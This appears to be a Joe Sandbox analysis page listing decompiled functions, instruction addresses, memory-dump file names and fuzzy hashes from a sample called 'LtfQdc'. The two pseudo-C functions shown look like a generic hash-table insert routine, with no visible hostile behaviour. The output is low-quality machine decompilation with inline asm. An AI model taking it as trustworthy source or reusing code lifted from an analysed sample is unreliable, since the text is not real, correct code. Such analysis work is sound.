0x00ceb4b4
0x00ceb4b9
0x00ceb4bc
0x00ceb4be
0x00ceb4e4
0x00ceb4e4
0x00ceb4e8
0x00ceb4ec
0x00ceb4f1
0x00ceb4f3
0x00ceb4f8
0x00ceb4fb
0x00ceb500
0x00ceb506
0x00ceb511
0x00ceb517
0x00ceb519
0x00ceb51c
0x00ceb521
0x00ceb524
0x00ceb526
0x00ceb52b
0x00ceb52d
0x00ceb52d
0x00ceb52d
0x00ceb52d
0x00ceb530
0x00ceb532
0x00ceb534
0x00ceb537
0x00ceb53c
0x00ceb53f
0x00ceb541
0x00ceb541
0x00ceb544
0x00ceb546
0x00ceb548
0x00ceb54b
0x00ceb54b
0x00ceb550
0x00ceb550
0x00ceb555
0x00ceb558
0x00ceb55a
0x00ceb629
0x00ceb629
0x00ceb62f
0x00000000
0x00ceb560
0x00ceb560
0x00ceb637
0x00ceb637
0x00ceb63a
0x00ceb63d
0x00ceb640
0x00ceb642
0x00ceb649
0x00ceb64c
0x00ceb64e
0x00ceb656
0x00ceb656
0x00ceb656
0x00ceb650
0x00ceb650
0x00ceb650
0x00ceb644
0x00ceb644
0x00ceb644
0x00ceb658
0x00ceb65a
0x00ceb65d
0x00ceb65f
0x00ceb66a
0x00ceb670
0x00ceb672
0x00ceb677
0x00ceb67a
0x00ceb67c
0x00ceb67e
0x00ceb681
0x00ceb6a5
0x00ceb6a5
0x00ceb6a8
0x00ceb6a8
0x00ceb6aa
0x00ceb6ac
0x00ceb6ac
0x00ceb6ae
0x00ceb6ba
0x00ceb6ba
0x00ceb683
0x00ceb686
0x00ceb689
0x00ceb68b
0x00ceb691
0x00ceb693
0x00ceb697
0x00ceb697
0x00ceb699
0x00ceb699
0x00ceb68d
0x00ceb68d
0x00ceb68d
0x00ceb6a1
0x00ceb6a1
0x00ceb6a3
0x00ceb6a3
0x00000000
0x00ceb6a3
0x00ceb663
0x00ceb665
0x00000000
0x00ceb665
0x00ceb569
0x00ceb56e
0x00ceb576
0x00ceb57e
0x00ceb582
0x00ceb587
0x00ceb58b
0x00ceb590
0x00ceb595
0x00ceb598
0x00ceb59d
0x00ceb5a3
0x00ceb5ab
0x00ceb5b4
0x00ceb5b6
0x00ceb5b9
0x00ceb618
0x00ceb618
0x00ceb61b
0x00ceb620
0x00ceb620
0x00ceb622
0x00ceb625
0x00ceb627
0x00000000
0x00000000
0x00000000
0x00ceb627
0x00ceb5ef
0x00ceb5f2
0x00ceb5f5
0x00000000
0x00000000
0x00ceb5f7
0x00ceb5fa
0x00ceb5fd
0x00ceb60a
0x00ceb60a
0x00000000
0x00ceb5fa
0x00ceb55a
0x00ceb4c0
0x00ceb4c4
0x00ceb4c8
0x00ceb4cc
0x00ceb4cf
0x00ceb4d3
0x00ceb4d7
0x00ceb4da
0x00000000
0x00000000
0x00ceb4dc
0x00000000
0x00ceb4dc
0x00ceb3cd
0x00ceb3d3
0x00ceb3e8
0x00ceb3eb
0x00ceb3ed
0x00ceb3ef
0x00ceb3f5
0x00ceb3f5
0x00ceb3f5
0x00ceb3f5
0x00ceb3d5
0x00ceb3d8
0x00ceb3db
0x00ceb3db
0x00ceb3fd
0x00ceb400
0x00ceb405
0x00000000
0x00000000
0x00ceb407
0x00ceb40d
0x00ceb431
0x00ceb431
0x00ceb435
0x00000000
0x00000000
0x00ceb437
0x00ceb43c
0x00ceb428
0x00ceb42b
0x00ceb60e
0x00ceb610
0x00000000
0x00ceb610
0x00000000
0x00ceb42b
0x00ceb441
0x00ceb420
0x00ceb420
0x00ceb443
0x00ceb445
0x00ceb44c
0x00ceb44e
0x00ceb44e
0x00ceb445
0x00ceb426
0x00000000
0x00000000
0x00000000
0x00000000
0x00ceb426
0x00000000

APIs

__floor_pentium4.LIBCMT ref: 00CEB4F3
__floor_pentium4.LIBCMT ref: 00CEB590

Memory Dump Source

Source File: 00000012.00000002.509560894.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000012.00000002.509547932.0000000000C80000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510364517.0000000000D26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510918412.0000000000D40000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510946033.0000000000D41000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510965056.0000000000D42000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511047291.0000000000D51000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511074426.0000000000D5A000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511130527.0000000000D5B000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_c80000_LtfQdc.jbxd

Similarity

API ID: __floor_pentium4
String ID:
API String ID: 4168288129-0
Opcode ID: 2c55c7f6df64917560f56727a68ad630e68064a0abf702bbed921656b214b247
Instruction ID: 7f33e6b0c665bae1b1e6fa7a428b4cbeae0023d6b928c76961d747e28fcff2fb
Opcode Fuzzy Hash: 2c55c7f6df64917560f56727a68ad630e68064a0abf702bbed921656b214b247
Instruction Fuzzy Hash: 15B1D471A116468FCB19CF6AC88167FB7B6AFD9310B18C629E415EB354E730ED818B90

Uniqueness

Uniqueness Score: -1.00%

Function 00CD00C0 Relevance: 3.3, APIs: 2, Instructions: 274
COMMONCrypto

Download Yara Rule

C-Code - Quality: 18%

			E00CD00C0(signed int __ecx, intOrPtr __fp0, signed int** _a4, intOrPtr* _a8, signed int** _a16) {
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				void* __ebx;
				void* __edi;
				signed int _t97;
				signed int _t98;
				signed int _t99;
				signed int _t100;
				signed int _t105;
				signed int _t108;
				signed int* _t109;
				signed int _t111;
				signed int _t114;
				signed int _t116;
				unsigned int _t125;
				signed int _t129;
				signed int* _t133;
				signed int** _t134;
				signed int _t135;
				signed int _t136;
				signed int _t138;
				signed int _t139;
				signed int _t140;
				signed int _t147;
				signed int _t150;
				signed int _t153;
				signed int _t154;
				void* _t157;
				signed int _t158;
				signed int _t182;
				unsigned int _t187;
				unsigned int _t189;
				signed int _t190;
				signed int _t191;
				signed int _t192;
				signed int** _t193;
				signed int _t194;
				signed int* _t196;
				intOrPtr _t207;

				_t207 = __fp0;
				_t135 = __ecx;
				_v20 =  *_a8;
				_t187 =  *(__ecx + 4);
				_v24 = __ecx;
				if(_t187 == 0) {
					_t190 = 0xffffffff;
					L17:
					 *_t196 = 0x1c;
					_t133 = L00CFDBBC();
					_t133[2] =  *( *_a16);
					asm("xorps xmm0, xmm0");
					asm("movups [ebx+0xc], xmm0");
					_t133[1] = _v20;
					 *_t133 = 0;
					_t136 = _v24;
					asm("movq xmm2, [0xd30dd0]");
					asm("movd xmm0, eax");
					asm("por xmm0, xmm2");
					asm("subsd xmm0, xmm2");
					asm("cvtsd2ss xmm0, xmm0");
					asm("movss xmm1, [ecx+0x10]");
					__eflags = _t187;
					if(__eflags == 0) {
						L19:
						asm("divss xmm0, xmm1");
						asm("cvtss2sd xmm0, xmm0");
						asm("movsd [esp], xmm0");
						_t97 = E00D236A0(_t136);
						_v40 = _t207;
						asm("movss xmm0, [ebp-0x24]");
						asm("cvttss2si eax, xmm0");
						asm("subss xmm0, [0xd30dd8]");
						asm("cvttss2si ecx, xmm0");
						_t138 = _t136 & _t97 >> 0x0000001f | _t97;
						_t153 = _t187 + _t187;
						_t98 = 1;
						__eflags = _t187 - 3;
						if(_t187 >= 3) {
							_t39 = _t187 - 1; // -1
							_t194 = _t39;
							__eflags = _t187 & _t194;
							_t43 = (_t187 & _t194) != 0;
							__eflags = _t43;
							_t98 = 0 | _t43;
						}
						_t99 = _t98 | _t153;
						__eflags = _t99 - _t138;
						_t100 =  <=  ? _t138 : _t99;
						_t191 = 2;
						__eflags = _t100 - 1;
						if(_t100 != 1) {
							_t45 = _t100 - 1; // 0x0
							_t139 = _t45;
							__eflags = _t100 & _t139;
							if((_t100 & _t139) != 0) {
								 *_t196 = _t100;
								_t191 = E00C9A3AC(_t133, _t187);
								_t140 = _v24;
								_t187 =  *(_t140 + 4);
							} else {
								_t191 = _t100;
								_t140 = _v24;
							}
						} else {
							_t140 = _v24;
						}
						_t154 = _v20;
						__eflags = _t191 - _t187;
						if(__eflags > 0) {
							L35:
							 *_t196 = _t191;
							L00CBDCB0(_t140, _t207);
							_t154 = _v20;
							_t140 = _v24;
							goto L36;
						} else {
							if(__eflags >= 0) {
								L36:
								_t187 =  *(_t140 + 4);
								_t59 = _t187 - 1; // -1
								_t192 = _t59;
								__eflags = _t187 & _t192;
								if((_t187 & _t192) != 0) {
									__eflags = _t154 - _t187;
									if(_t154 >= _t187) {
										_t63 = _t154 % _t187;
										__eflags = _t63;
										_t190 = _t63;
										_t140 = _v24;
									} else {
										_t190 = _t154;
									}
								} else {
									_t190 = _t192 & _t154;
								}
								L41:
								_t157 =  *_t140;
								_t105 =  *(_t157 + _t190 * 4);
								__eflags = _t105;
								if(_t105 == 0) {
									 *_t133 =  *(_t140 + 8);
									 *(_t140 + 8) = _t133;
									 *(_t157 + _t190 * 4) = _t140 + 8;
									_t108 =  *_t133;
									__eflags = _t108;
									_t193 = _a4;
									if(_t108 == 0) {
										L50:
										_t85 = _t140 + 0xc;
										 *_t85 =  *(_t140 + 0xc) + 1;
										__eflags =  *_t85;
										_t109 = 1;
										goto L51;
									}
									_t111 =  *(_t108 + 4);
									_t77 = _t187 - 1; // -1
									_t158 = _t77;
									__eflags = _t187 & _t158;
									if((_t187 & _t158) != 0) {
										__eflags = _t111 - _t187;
										if(_t111 >= _t187) {
											_t81 = _t111 % _t187;
											__eflags = _t81;
											_t111 = _t81;
											_t140 = _v24;
										}
									} else {
										_t111 = _t111 & _t158;
									}
									_t105 = (_t111 << 2) +  *_t140;
									__eflags = _t105;
									L49:
									 *_t105 = _t133;
									goto L50;
								}
								 *_t133 =  *_t105;
								_t193 = _a4;
								goto L49;
							}
							asm("movss xmm0, [ecx+0xc]");
							asm("orpd xmm0, [0xd30de0]");
							asm("subsd xmm0, [0xd30dd0]");
							asm("cvtsd2ss xmm0, xmm0");
							asm("divss xmm0, [ecx+0x10]");
							asm("cvtss2sd xmm0, xmm0");
							asm("movsd [esp], xmm0");
							_t114 = E00D236A0(_t140);
							_v36 = _t207;
							asm("movss xmm0, [ebp-0x20]");
							asm("cvttss2si ecx, xmm0");
							asm("subss xmm0, [0xd30dd8]");
							asm("cvttss2si eax, xmm0");
							_t116 = _t114 & _t140 >> 0x0000001f | _t140;
							__eflags = _t187 - 3;
							if(_t187 < 3) {
								L33:
								 *_t196 = _t116;
								_t116 = E00C9A3AC(_t133, _t187);
								L34:
								_t140 = _v24;
								_t154 = _v20;
								__eflags = _t191 - _t116;
								_t191 =  <=  ? _t116 : _t191;
								__eflags = _t191 - _t187;
								if(_t191 >= _t187) {
									goto L36;
								}
								goto L35;
							}
							_t147 = (((_t187 - (_t187 >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) + (_t187 - (_t187 >> 0x00000001 & 0x55555555) & 0x33333333) >> 0x00000004) + (_t187 - (_t187 >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) + (_t187 - (_t187 >> 0x00000001 & 0x55555555) & 0x33333333) & 0x0f0f0f0f) * 0x1010101 >> 0x18;
							__eflags = _t147 - 1;
							if(_t147 > 1) {
								goto L33;
							}
							__eflags = _t116 - 2;
							if(_t116 >= 2) {
								asm("bsr ecx, eax");
								_t116 = 1 <<  ~(_t147 ^ 0x0000001f);
							}
							goto L34;
						}
					}
					asm("movd xmm3, edi");
					asm("por xmm3, xmm2");
					asm("subsd xmm3, xmm2");
					asm("xorps xmm2, xmm2");
					asm("cvtsd2ss xmm2, xmm3");
					asm("mulss xmm2, xmm1");
					asm("ucomiss xmm0, xmm2");
					if(__eflags <= 0) {
						goto L41;
					}
					goto L19;
				} else {
					_t125 = _t187;
					_t189 = (((_t187 - (_t187 >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) + (_t187 - (_t187 >> 0x00000001 & 0x55555555) & 0x33333333) >> 0x00000004) + (_t187 - (_t187 >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) + (_t187 - (_t187 >> 0x00000001 & 0x55555555) & 0x33333333) & 0x0f0f0f0f) * 0x1010101 >> 0x18;
					_v28 = _t125;
					if(_t189 > 1) {
						_t182 = _v20;
						_t190 = _t182;
						__eflags = _t182 - _t125;
						if(_t182 >= _t125) {
							_t11 = _t182 % _v28;
							__eflags = _t11;
							_t190 = _t11;
							_t182 = _v20;
							_t135 = _v24;
						}
					} else {
						_t6 = _t125 - 1; // -1
						_t182 = _v20;
						_t190 = _t6 & _t182;
					}
					_t134 =  *( *_t135 + _t190 * 4);
					if(_t134 == 0) {
						L16:
						_t187 = _v28;
						goto L17;
					}
					_v32 = _v28 - 1;
					_t150 = _v28;
					while(1) {
						_t133 =  *_t134;
						if(_t133 == 0) {
							goto L16;
						}
						_t129 = _t133[1];
						if(_t129 == _t182) {
							L10:
							if(_t133[2] == _t182) {
								_t109 = 0;
								_t193 = _a4;
								L51:
								 *_t193 = _t133;
								_t193[1] = _t109;
								return _t193;
							}
							continue;
						}
						if(_t189 <= 1) {
							_t129 = _t129 & _v32;
							__eflags = _t129;
						} else {
							if(_t129 >= _t150) {
								_t129 = _t129 % _t150;
								_t182 = _v20;
							}
						}
						if(_t129 != _t190) {
							goto L16;
						} else {
							goto L10;
						}
					}
					goto L16;
				}
			}

0x00cd00c0
0x00cd00c0
0x00cd00ce
0x00cd00d1
0x00cd00d6
0x00cd00d9
0x00cd0125
0x00cd0194
0x00cd0194
0x00cd01a0
0x00cd01a9
0x00cd01ac
0x00cd01af
0x00cd01b6
0x00cd01b9
0x00cd01bf
0x00cd01c6
0x00cd01ce
0x00cd01d2
0x00cd01d6
0x00cd01da
0x00cd01de
0x00cd01e3
0x00cd01e5
0x00cd0207
0x00cd0207
0x00cd020b
0x00cd020f
0x00cd0214
0x00cd0219
0x00cd021c
0x00cd0221
0x00cd0227
0x00cd0232
0x00cd0238
0x00cd023a
0x00cd023d
0x00cd0242
0x00cd0245
0x00cd0247
0x00cd0247
0x00cd024c
0x00cd024e
0x00cd024e
0x00cd024e
0x00cd024e
0x00cd0251
0x00cd0253
0x00cd0255
0x00cd0258
0x00cd025d
0x00cd0260
0x00cd0267
0x00cd0267
0x00cd026a
0x00cd026c
0x00cd027f
0x00cd0287
0x00cd0289
0x00cd028c
0x00cd026e
0x00cd026e
0x00cd0270
0x00cd0270
0x00cd0262
0x00cd0262
0x00cd0262
0x00cd028f
0x00cd0292
0x00cd0294
0x00cd035c
0x00cd035c
0x00cd035f
0x00cd0367
0x00cd036a
0x00000000
0x00cd029a
0x00cd029a
0x00cd036d
0x00cd036d
0x00cd0370
0x00cd0370
0x00cd0373
0x00cd0375
0x00cd037b
0x00cd037d
0x00cd0387
0x00cd0387
0x00cd0389
0x00cd038b
0x00cd037f
0x00cd037f
0x00cd037f
0x00cd0377
0x00cd0377
0x00cd0377
0x00cd038e
0x00cd038e
0x00cd0390
0x00cd0393
0x00cd0395
0x00cd03a3
0x00cd03a8
0x00cd03ab
0x00cd03ae
0x00cd03b0
0x00cd03b2
0x00cd03b5
0x00cd03d9
0x00cd03d9
0x00cd03d9
0x00cd03d9
0x00cd03dc
0x00000000
0x00cd03dc
0x00cd03b7
0x00cd03ba
0x00cd03ba
0x00cd03bd
0x00cd03bf
0x00cd03c5
0x00cd03c7
0x00cd03cb
0x00cd03cb
0x00cd03cd
0x00cd03cf
0x00cd03cf
0x00cd03c1
0x00cd03c1
0x00cd03c1
0x00cd03d5
0x00cd03d5
0x00cd03d7
0x00cd03d7
0x00000000
0x00cd03d7
0x00cd0399
0x00cd039b
0x00000000
0x00cd039b
0x00cd02a0
0x00cd02a5
0x00cd02ad
0x00cd02b5
0x00cd02b9
0x00cd02be
0x00cd02c2
0x00cd02c7
0x00cd02cc
0x00cd02cf
0x00cd02d4
0x00cd02da
0x00cd02e2
0x00cd02eb
0x00cd02ed
0x00cd02f0
0x00cd0345
0x00cd0345
0x00cd0348
0x00cd034d
0x00cd034d
0x00cd0350
0x00cd0353
0x00cd0355
0x00cd0358
0x00cd035a
0x00000000
0x00000000
0x00000000
0x00cd035a
0x00cd0326
0x00cd0329
0x00cd032c
0x00000000
0x00000000
0x00cd032e
0x00cd0331
0x00cd0334
0x00cd0341
0x00cd0341
0x00000000
0x00cd0331
0x00cd0294
0x00cd01e7
0x00cd01eb
0x00cd01ef
0x00cd01f3
0x00cd01f6
0x00cd01fa
0x00cd01fe
0x00cd0201
0x00000000
0x00000000
0x00000000
0x00cd00db
0x00cd0108
0x00cd0110
0x00cd0116
0x00cd0119
0x00cd012c
0x00cd012f
0x00cd0131
0x00cd0133
0x00cd0139
0x00cd0139
0x00cd013c
0x00cd013e
0x00cd0141
0x00cd0141
0x00cd011b
0x00cd011b
0x00cd011e
0x00cd0121
0x00cd0121
0x00cd0146
0x00cd014b
0x00cd0191
0x00cd0191
0x00000000
0x00cd0191
0x00cd0151
0x00cd0154
0x00cd0170
0x00cd0170
0x00cd0174
0x00000000
0x00000000
0x00cd0176
0x00cd017b
0x00cd0167
0x00cd016a
0x00cd0275
0x00cd0277
0x00cd03de
0x00cd03de
0x00cd03e0
0x00cd03ec
0x00cd03ec
0x00000000
0x00cd016a
0x00cd0180
0x00cd0160
0x00cd0160
0x00cd0182
0x00cd0184
0x00cd018a
0x00cd018c
0x00cd018c
0x00cd0184
0x00cd0165
0x00000000
0x00000000
0x00000000
0x00000000
0x00cd0165
0x00000000
0x00cd0170

APIs

__floor_pentium4.LIBCMT ref: 00CD0214
__floor_pentium4.LIBCMT ref: 00CD02C7

Memory Dump Source

Source File: 00000012.00000002.509560894.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000012.00000002.509547932.0000000000C80000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510364517.0000000000D26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510918412.0000000000D40000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510946033.0000000000D41000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510965056.0000000000D42000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511047291.0000000000D51000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511074426.0000000000D5A000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511130527.0000000000D5B000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_c80000_LtfQdc.jbxd

Similarity

API ID: __floor_pentium4
String ID:
API String ID: 4168288129-0
Opcode ID: 12dedc808ca42dbfb237768afbea43ca1b5844424db197a142ea424085462a00
Instruction ID: 9d84358fec8dc68a0c0f10f5d44b37fa2bf74af7392a682283daa2613e9837fe
Opcode Fuzzy Hash: 12dedc808ca42dbfb237768afbea43ca1b5844424db197a142ea424085462a00
Instruction Fuzzy Hash: 94A1D332F006158FCB15CE69C88066EB3B2AFD9310B39C66AD915EB315E731ED818B91

Uniqueness

Uniqueness Score: -1.00%

Function 00CCF530 Relevance: 3.3, APIs: 2, Instructions: 273
COMMONCrypto

Download Yara Rule

C-Code - Quality: 19%

			E00CCF530(signed int __ecx, intOrPtr __fp0, signed int** _a4, intOrPtr* _a8, signed int** _a16) {
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				void* __ebx;
				void* __edi;
				signed int _t98;
				signed int _t99;
				signed int _t100;
				signed int _t101;
				signed int _t106;
				signed int _t109;
				signed int* _t110;
				signed int _t112;
				signed int _t115;
				signed int _t117;
				unsigned int _t126;
				signed int _t130;
				signed int* _t134;
				signed int** _t135;
				signed int _t136;
				signed int _t137;
				signed int _t139;
				signed int _t140;
				signed int _t141;
				signed int _t148;
				signed int _t151;
				signed int _t154;
				signed int _t155;
				void* _t158;
				signed int _t159;
				signed int _t183;
				unsigned int _t188;
				unsigned int _t190;
				signed int _t191;
				signed int _t192;
				signed int _t193;
				signed int** _t194;
				signed int _t195;
				signed int* _t197;
				intOrPtr _t208;

				_t208 = __fp0;
				_t136 = __ecx;
				_v20 =  *_a8;
				_t188 =  *(__ecx + 4);
				_v24 = __ecx;
				if(_t188 == 0) {
					_t191 = 0xffffffff;
					L17:
					 *_t197 = 0x10;
					_t134 = L00CFDBBC();
					_t134[2] =  *( *_a16);
					_t134[3] = 0;
					_t134[1] = _v20;
					 *_t134 = 0;
					_t137 = _v24;
					asm("movq xmm2, [0xd30dd0]");
					asm("movd xmm0, eax");
					asm("por xmm0, xmm2");
					asm("subsd xmm0, xmm2");
					asm("cvtsd2ss xmm0, xmm0");
					asm("movss xmm1, [ecx+0x10]");
					__eflags = _t188;
					if(__eflags == 0) {
						L19:
						asm("divss xmm0, xmm1");
						asm("cvtss2sd xmm0, xmm0");
						asm("movsd [esp], xmm0");
						_t98 = E00D236A0(_t137);
						_v40 = _t208;
						asm("movss xmm0, [ebp-0x24]");
						asm("cvttss2si eax, xmm0");
						asm("subss xmm0, [0xd30dd8]");
						asm("cvttss2si ecx, xmm0");
						_t139 = _t137 & _t98 >> 0x0000001f | _t98;
						_t154 = _t188 + _t188;
						_t99 = 1;
						__eflags = _t188 - 3;
						if(_t188 >= 3) {
							_t40 = _t188 - 1; // 0xd2f0bb
							_t195 = _t40;
							__eflags = _t188 & _t195;
							_t44 = (_t188 & _t195) != 0;
							__eflags = _t44;
							_t99 = 0 | _t44;
						}
						_t100 = _t99 | _t154;
						__eflags = _t100 - _t139;
						_t101 =  <=  ? _t139 : _t100;
						_t192 = 2;
						__eflags = _t101 - 1;
						if(_t101 != 1) {
							_t46 = _t101 - 1; // 0x0
							_t140 = _t46;
							__eflags = _t101 & _t140;
							if((_t101 & _t140) != 0) {
								 *_t197 = _t101;
								_t192 = E00C9A3AC(_t134, _t188);
								_t141 = _v24;
								_t188 =  *(_t141 + 4);
							} else {
								_t192 = _t101;
								_t141 = _v24;
							}
						} else {
							_t141 = _v24;
						}
						_t155 = _v20;
						__eflags = _t192 - _t188;
						if(__eflags > 0) {
							L35:
							 *_t197 = _t192;
							L00CBDCB0(_t141, _t208);
							_t155 = _v20;
							_t141 = _v24;
							goto L36;
						} else {
							if(__eflags >= 0) {
								L36:
								_t188 =  *(_t141 + 4);
								_t60 = _t188 - 1; // 0xd2f0bb
								_t193 = _t60;
								__eflags = _t188 & _t193;
								if((_t188 & _t193) != 0) {
									__eflags = _t155 - _t188;
									if(_t155 >= _t188) {
										_t64 = _t155 % _t188;
										__eflags = _t64;
										_t191 = _t64;
										_t141 = _v24;
									} else {
										_t191 = _t155;
									}
								} else {
									_t191 = _t193 & _t155;
								}
								L41:
								_t158 =  *_t141;
								_t106 =  *(_t158 + _t191 * 4);
								__eflags = _t106;
								if(_t106 == 0) {
									 *_t134 =  *(_t141 + 8);
									 *(_t141 + 8) = _t134;
									 *(_t158 + _t191 * 4) = _t141 + 8;
									_t109 =  *_t134;
									__eflags = _t109;
									_t194 = _a4;
									if(_t109 == 0) {
										L50:
										_t86 = _t141 + 0xc;
										 *_t86 =  *(_t141 + 0xc) + 1;
										__eflags =  *_t86;
										_t110 = 1;
										goto L51;
									}
									_t112 =  *(_t109 + 4);
									_t78 = _t188 - 1; // 0xd2f0bb
									_t159 = _t78;
									__eflags = _t188 & _t159;
									if((_t188 & _t159) != 0) {
										__eflags = _t112 - _t188;
										if(_t112 >= _t188) {
											_t82 = _t112 % _t188;
											__eflags = _t82;
											_t112 = _t82;
											_t141 = _v24;
										}
									} else {
										_t112 = _t112 & _t159;
									}
									_t106 = (_t112 << 2) +  *_t141;
									__eflags = _t106;
									L49:
									 *_t106 = _t134;
									goto L50;
								}
								 *_t134 =  *_t106;
								_t194 = _a4;
								goto L49;
							}
							asm("movss xmm0, [ecx+0xc]");
							asm("orpd xmm0, [0xd30de0]");
							asm("subsd xmm0, [0xd30dd0]");
							asm("cvtsd2ss xmm0, xmm0");
							asm("divss xmm0, [ecx+0x10]");
							asm("cvtss2sd xmm0, xmm0");
							asm("movsd [esp], xmm0");
							_t115 = E00D236A0(_t141);
							_v36 = _t208;
							asm("movss xmm0, [ebp-0x20]");
							asm("cvttss2si ecx, xmm0");
							asm("subss xmm0, [0xd30dd8]");
							asm("cvttss2si eax, xmm0");
							_t117 = _t115 & _t141 >> 0x0000001f | _t141;
							__eflags = _t188 - 3;
							if(_t188 < 3) {
								L33:
								 *_t197 = _t117;
								_t117 = E00C9A3AC(_t134, _t188);
								L34:
								_t141 = _v24;
								_t155 = _v20;
								__eflags = _t192 - _t117;
								_t192 =  <=  ? _t117 : _t192;
								__eflags = _t192 - _t188;
								if(_t192 >= _t188) {
									goto L36;
								}
								goto L35;
							}
							_t148 = (((_t188 - (_t188 >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) + (_t188 - (_t188 >> 0x00000001 & 0x55555555) & 0x33333333) >> 0x00000004) + (_t188 - (_t188 >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) + (_t188 - (_t188 >> 0x00000001 & 0x55555555) & 0x33333333) & 0x0f0f0f0f) * 0x1010101 >> 0x18;
							__eflags = _t148 - 1;
							if(_t148 > 1) {
								goto L33;
							}
							__eflags = _t117 - 2;
							if(_t117 >= 2) {
								asm("bsr ecx, eax");
								_t117 = 1 <<  ~(_t148 ^ 0x0000001f);
							}
							goto L34;
						}
					}
					asm("movd xmm3, edi");
					asm("por xmm3, xmm2");
					asm("subsd xmm3, xmm2");
					asm("xorps xmm2, xmm2");
					asm("cvtsd2ss xmm2, xmm3");
					asm("mulss xmm2, xmm1");
					asm("ucomiss xmm0, xmm2");
					if(__eflags <= 0) {
						goto L41;
					}
					goto L19;
				} else {
					_t126 = _t188;
					_t190 = (((_t188 - (_t188 >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) + (_t188 - (_t188 >> 0x00000001 & 0x55555555) & 0x33333333) >> 0x00000004) + (_t188 - (_t188 >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) + (_t188 - (_t188 >> 0x00000001 & 0x55555555) & 0x33333333) & 0x0f0f0f0f) * 0x1010101 >> 0x18;
					_v28 = _t126;
					if(_t190 > 1) {
						_t183 = _v20;
						_t191 = _t183;
						__eflags = _t183 - _t126;
						if(_t183 >= _t126) {
							_t11 = _t183 % _v28;
							__eflags = _t11;
							_t191 = _t11;
							_t183 = _v20;
							_t136 = _v24;
						}
					} else {
						_t6 = _t126 - 1; // 0xd2f0bb
						_t183 = _v20;
						_t191 = _t6 & _t183;
					}
					_t135 =  *( *_t136 + _t191 * 4);
					if(_t135 == 0) {
						L16:
						_t188 = _v28;
						goto L17;
					}
					_v32 = _v28 - 1;
					_t151 = _v28;
					while(1) {
						_t134 =  *_t135;
						if(_t134 == 0) {
							goto L16;
						}
						_t24 =  &(_t134[1]); // 0xc683ce89
						_t130 =  *_t24;
						if(_t130 == _t183) {
							L10:
							if(_t134[2] == _t183) {
								_t110 = 0;
								_t194 = _a4;
								L51:
								 *_t194 = _t134;
								_t194[1] = _t110;
								return _t194;
							}
							continue;
						}
						if(_t190 <= 1) {
							_t130 = _t130 & _v32;
							__eflags = _t130;
						} else {
							if(_t130 >= _t151) {
								_t130 = _t130 % _t151;
								_t183 = _v20;
							}
						}
						if(_t130 != _t191) {
							goto L16;
						} else {
							goto L10;
						}
					}
					goto L16;
				}
			}

0x00ccf530
0x00ccf530
0x00ccf53e
0x00ccf541
0x00ccf546
0x00ccf549
0x00ccf595
0x00ccf604
0x00ccf604
0x00ccf610
0x00ccf619
0x00ccf61c
0x00ccf626
0x00ccf629
0x00ccf62f
0x00ccf636
0x00ccf63e
0x00ccf642
0x00ccf646
0x00ccf64a
0x00ccf64e
0x00ccf653
0x00ccf655
0x00ccf677
0x00ccf677
0x00ccf67b
0x00ccf67f
0x00ccf684
0x00ccf689
0x00ccf68c
0x00ccf691
0x00ccf697
0x00ccf6a2
0x00ccf6a8
0x00ccf6aa
0x00ccf6ad
0x00ccf6b2
0x00ccf6b5
0x00ccf6b7
0x00ccf6b7
0x00ccf6bc
0x00ccf6be
0x00ccf6be
0x00ccf6be
0x00ccf6be
0x00ccf6c1
0x00ccf6c3
0x00ccf6c5
0x00ccf6c8
0x00ccf6cd
0x00ccf6d0
0x00ccf6d7
0x00ccf6d7
0x00ccf6da
0x00ccf6dc
0x00ccf6ef
0x00ccf6f7
0x00ccf6f9
0x00ccf6fc
0x00ccf6de
0x00ccf6de
0x00ccf6e0
0x00ccf6e0
0x00ccf6d2
0x00ccf6d2
0x00ccf6d2
0x00ccf6ff
0x00ccf702
0x00ccf704
0x00ccf7cc
0x00ccf7cc
0x00ccf7cf
0x00ccf7d7
0x00ccf7da
0x00000000
0x00ccf70a
0x00ccf70a
0x00ccf7dd
0x00ccf7dd
0x00ccf7e0
0x00ccf7e0
0x00ccf7e3
0x00ccf7e5
0x00ccf7eb
0x00ccf7ed
0x00ccf7f7
0x00ccf7f7
0x00ccf7f9
0x00ccf7fb
0x00ccf7ef
0x00ccf7ef
0x00ccf7ef
0x00ccf7e7
0x00ccf7e7
0x00ccf7e7
0x00ccf7fe
0x00ccf7fe
0x00ccf800
0x00ccf803
0x00ccf805
0x00ccf813
0x00ccf818
0x00ccf81b
